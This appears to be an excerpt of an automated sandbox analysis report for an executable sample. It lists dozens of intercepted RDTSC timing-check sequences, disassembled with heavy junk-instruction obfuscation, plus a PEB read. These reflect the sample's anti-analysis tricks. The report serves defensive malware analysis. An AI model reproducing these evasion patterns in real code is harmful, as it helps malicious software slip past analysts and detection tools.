Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 11495FD second address: 1149618 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 pop edx 0x00000008 jmp 00007F78B9095CEBh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 pushad 0x00000011 push ecx 0x00000012 pop ecx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 1157BEC second address: 1157C00 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F78B909B0F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c pop eax 0x0000000d jnc 00007F78B909B0F6h 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 115BC46 second address: 115BC4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 115BC4C second address: 115BC59 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jp 00007F78B909B0F6h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 115BDB0 second address: 115BDB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 115BDB6 second address: 115BDC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 1221A63 second address: 1221A67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 1221E59 second address: 1221E78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d pop eax 0x0000000e popad 0x0000000f jmp 00007F78B909B100h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 1221E78 second address: 1221E84 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007F78B9095CE6h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 1221FCB second address: 1221FFD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F78B909B0F6h 0x0000000a jnc 00007F78B909B0F6h 0x00000010 popad 0x00000011 push edx 0x00000012 push edx 0x00000013 pop edx 0x00000014 push eax 0x00000015 pop eax 0x00000016 pop edx 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F78B909B107h 0x0000001e pushad 0x0000001f popad 0x00000020 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 122242D second address: 1222431 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 1222431 second address: 122243B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 122243B second address: 122243F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 122243F second address: 1222445 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 122272D second address: 1222749 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F78B9095CF8h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 1222749 second address: 1222796 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F78B909B0FFh 0x00000007 jmp 00007F78B909B101h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push edx 0x0000000f jmp 00007F78B909B101h 0x00000014 jmp 00007F78B909B106h 0x00000019 pop edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 1222912 second address: 1222918 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 1222918 second address: 1222940 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jmp 00007F78B909B109h 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e jno 00007F78B909B0F6h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 1224242 second address: 1224248 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 1224248 second address: 1224250 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 1226E51 second address: 1226EA5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b call 00007F78B9095CEAh 0x00000010 movsx edx, bx 0x00000013 pop edx 0x00000014 push 00000004h 0x00000016 pushad 0x00000017 mov dword ptr [ebp+12A02798h], ebx 0x0000001d or edx, dword ptr [ebp+12A02010h] 0x00000023 popad 0x00000024 call 00007F78B9095CE9h 0x00000029 jmp 00007F78B9095CF8h 0x0000002e push eax 0x0000002f js 00007F78B9095D02h 0x00000035 pushad 0x00000036 push eax 0x00000037 push edx 0x00000038 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 1226EA5 second address: 1226EE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F78B909B104h 0x00000009 popad 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e push edi 0x0000000f ja 00007F78B909B106h 0x00000015 pop edi 0x00000016 mov eax, dword ptr [eax] 0x00000018 push eax 0x00000019 push edx 0x0000001a jbe 00007F78B909B0F8h 0x00000020 push edi 0x00000021 pop edi 0x00000022 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 12288A0 second address: 12288AA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007F78B9095CE6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 12288AA second address: 12288C3 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F78B909B0F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d jmp 00007F78B909B0FAh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 12288C3 second address: 12288C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 71F0081 second address: 71F0097 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F78B909B0FBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 71F0097 second address: 71F009B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 71F009B second address: 71F00A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 71F00A1 second address: 71F00A7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 71F00A7 second address: 71F00AB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 71F00AB second address: 71F00BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 71F00BB second address: 71F00C1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 71F00C1 second address: 71F01AA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F78B9095CF2h 0x00000008 mov ecx, 5ED9D5F1h 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 mov eax, dword ptr fs:[00000030h] 0x00000016 pushad 0x00000017 mov bx, si 0x0000001a mov edx, eax 0x0000001c popad 0x0000001d sub esp, 18h 0x00000020 jmp 00007F78B9095CF0h 0x00000025 xchg eax, ebx 0x00000026 jmp 00007F78B9095CF0h 0x0000002b push eax 0x0000002c pushad 0x0000002d pushfd 0x0000002e jmp 00007F78B9095CF1h 0x00000033 sub cl, FFFFFF96h 0x00000036 jmp 00007F78B9095CF1h 0x0000003b popfd 0x0000003c pushfd 0x0000003d jmp 00007F78B9095CF0h 0x00000042 sbb ecx, 461CD8B8h 0x00000048 jmp 00007F78B9095CEBh 0x0000004d popfd 0x0000004e popad 0x0000004f xchg eax, ebx 0x00000050 push eax 0x00000051 push edx 0x00000052 pushad 0x00000053 pushfd 0x00000054 jmp 00007F78B9095CEBh 0x00000059 adc al, 0000007Eh 0x0000005c jmp 00007F78B9095CF9h 0x00000061 popfd 0x00000062 pushfd 0x00000063 jmp 00007F78B9095CF0h 0x00000068 sbb ch, 00000078h 0x0000006b jmp 00007F78B9095CEBh 0x00000070 popfd 0x00000071 popad 0x00000072 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 71F01AA second address: 71F0220 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F78B909B0FFh 0x00000009 add eax, 3247D53Eh 0x0000000f jmp 00007F78B909B109h 0x00000014 popfd 0x00000015 call 00007F78B909B100h 0x0000001a pop ecx 0x0000001b popad 0x0000001c pop edx 0x0000001d pop eax 0x0000001e mov ebx, dword ptr [eax+10h] 0x00000021 jmp 00007F78B909B101h 0x00000026 xchg eax, esi 0x00000027 push eax 0x00000028 push edx 0x00000029 pushad 0x0000002a jmp 00007F78B909B103h 0x0000002f movzx ecx, bx 0x00000032 popad 0x00000033 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 71F0220 second address: 71F0226 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 71F0226 second address: 71F022A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 71F022A second address: 71F02A7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F78B9095CECh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d push ebx 0x0000000e pushfd 0x0000000f jmp 00007F78B9095CECh 0x00000014 sbb esi, 137F9E28h 0x0000001a jmp 00007F78B9095CEBh 0x0000001f popfd 0x00000020 pop eax 0x00000021 popad 0x00000022 xchg eax, esi 0x00000023 pushad 0x00000024 jmp 00007F78B9095CF7h 0x00000029 popad 0x0000002a mov esi, dword ptr [772406ECh] 0x00000030 jmp 00007F78B9095CF6h 0x00000035 test esi, esi 0x00000037 pushad 0x00000038 mov edi, ecx 0x0000003a call 00007F78B9095CEAh 0x0000003f push eax 0x00000040 push edx 0x00000041 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 71F02A7 second address: 71F0330 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 jne 00007F78B909BF9Bh 0x0000000c pushad 0x0000000d mov cl, dh 0x0000000f push esi 0x00000010 jmp 00007F78B909B105h 0x00000015 pop esi 0x00000016 popad 0x00000017 push esi 0x00000018 jmp 00007F78B909B0FCh 0x0000001d mov dword ptr [esp], edi 0x00000020 jmp 00007F78B909B100h 0x00000025 call dword ptr [77210B60h] 0x0000002b mov eax, 766BE5E0h 0x00000030 ret 0x00000031 jmp 00007F78B909B100h 0x00000036 push 00000044h 0x00000038 jmp 00007F78B909B100h 0x0000003d pop edi 0x0000003e push eax 0x0000003f push edx 0x00000040 jmp 00007F78B909B107h 0x00000045 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 71F0330 second address: 71F0354 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F78B9095CF9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, edi 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 71F0354 second address: 71F0367 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F78B909B0FFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 71F0367 second address: 71F038B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F78B9095CF9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 71F038B second address: 71F038F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 71F038F second address: 71F0393 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 71F0393 second address: 71F0399 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 71F0399 second address: 71F039F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 71F039F second address: 71F03A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 71F03A3 second address: 71F03A7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 71F041E second address: 71F0424 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 71F0424 second address: 71F0475 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bx, cx 0x00000006 mov cx, 8C8Fh 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov esi, eax 0x0000000f pushad 0x00000010 mov ebx, ecx 0x00000012 mov edx, eax 0x00000014 popad 0x00000015 test esi, esi 0x00000017 pushad 0x00000018 pushfd 0x00000019 jmp 00007F78B9095CF4h 0x0000001e adc ecx, 6C05EF68h 0x00000024 jmp 00007F78B9095CEBh 0x00000029 popfd 0x0000002a mov esi, 11BEE15Fh 0x0000002f popad 0x00000030 je 00007F7929064F25h 0x00000036 push eax 0x00000037 push edx 0x00000038 push eax 0x00000039 push edx 0x0000003a push eax 0x0000003b push edx 0x0000003c rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 71F0475 second address: 71F0479 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 71F0479 second address: 71F047D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 71F047D second address: 71F0483 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 71F0483 second address: 71F04BD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F78B9095CF4h 0x00000009 and cx, ACF8h 0x0000000e jmp 00007F78B9095CEBh 0x00000013 popfd 0x00000014 movzx ecx, bx 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a mov eax, 00000000h 0x0000001f push eax 0x00000020 push edx 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 71F04BD second address: 71F04C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 71F04C1 second address: 71F04C7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 71F04C7 second address: 71F04D6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F78B909B0FBh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 71F04D6 second address: 71F04DA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 71F04DA second address: 71F04F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esi], edi 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F78B909B100h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 71F04F6 second address: 71F052F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F78B9095CEBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+04h], eax 0x0000000c jmp 00007F78B9095CF6h 0x00000011 mov dword ptr [esi+08h], eax 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F78B9095CEAh 0x0000001d rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 71F052F second address: 71F0535 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 71F0535 second address: 71F057D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop esi 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esi+0Ch], eax 0x0000000b pushad 0x0000000c mov cx, di 0x0000000f mov edi, 38C0DF42h 0x00000014 popad 0x00000015 mov eax, dword ptr [ebx+4Ch] 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b pushfd 0x0000001c jmp 00007F78B9095CF5h 0x00000021 xor cx, 2F16h 0x00000026 jmp 00007F78B9095CF1h 0x0000002b popfd 0x0000002c rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 71F057D second address: 71F05C3 instructions: 0x00000000 rdtsc 0x00000002 mov ch, 2Dh 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F78B909B103h 0x0000000c call 00007F78B909B108h 0x00000011 pop ecx 0x00000012 popad 0x00000013 popad 0x00000014 mov dword ptr [esi+10h], eax 0x00000017 pushad 0x00000018 mov al, dh 0x0000001a mov bh, ah 0x0000001c popad 0x0000001d mov eax, dword ptr [ebx+50h] 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 71F05C3 second address: 71F05CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop edx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 71F05CA second address: 71F05D0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 71F05D0 second address: 71F05D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 71F05D4 second address: 71F05D8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 71F05D8 second address: 71F062C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esi+14h], eax 0x0000000b pushad 0x0000000c mov cl, bl 0x0000000e popad 0x0000000f mov eax, dword ptr [ebx+54h] 0x00000012 pushad 0x00000013 pushfd 0x00000014 jmp 00007F78B9095CF7h 0x00000019 sbb cl, 0000006Eh 0x0000001c jmp 00007F78B9095CF9h 0x00000021 popfd 0x00000022 mov bl, ah 0x00000024 popad 0x00000025 mov dword ptr [esi+18h], eax 0x00000028 push eax 0x00000029 push edx 0x0000002a push eax 0x0000002b push edx 0x0000002c push eax 0x0000002d push edx 0x0000002e rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 71F062C second address: 71F0630 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 71F0630 second address: 71F0634 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 71F0634 second address: 71F063A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 71F063A second address: 71F063F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 71F063F second address: 71F067C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F78B909B103h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [ebx+58h] 0x0000000f jmp 00007F78B909B106h 0x00000014 mov dword ptr [esi+1Ch], eax 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a pushad 0x0000001b popad 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 71F067C second address: 71F0681 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 71F0681 second address: 71F0722 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F78B909B106h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [ebx+5Ch] 0x0000000c jmp 00007F78B909B100h 0x00000011 mov dword ptr [esi+20h], eax 0x00000014 jmp 00007F78B909B100h 0x00000019 mov eax, dword ptr [ebx+60h] 0x0000001c pushad 0x0000001d pushad 0x0000001e mov ebx, eax 0x00000020 mov ah, 1Ch 0x00000022 popad 0x00000023 pushad 0x00000024 pushfd 0x00000025 jmp 00007F78B909B0FBh 0x0000002a adc cl, FFFFFFFEh 0x0000002d jmp 00007F78B909B109h 0x00000032 popfd 0x00000033 call 00007F78B909B100h 0x00000038 pop eax 0x00000039 popad 0x0000003a popad 0x0000003b mov dword ptr [esi+24h], eax 0x0000003e push eax 0x0000003f push edx 0x00000040 push eax 0x00000041 push edx 0x00000042 jmp 00007F78B909B103h 0x00000047 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 71F0722 second address: 71F073F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F78B9095CF9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 71F073F second address: 71F0745 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 71F0745 second address: 71F0749 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 71F0749 second address: 71F075A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [ebx+64h] 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
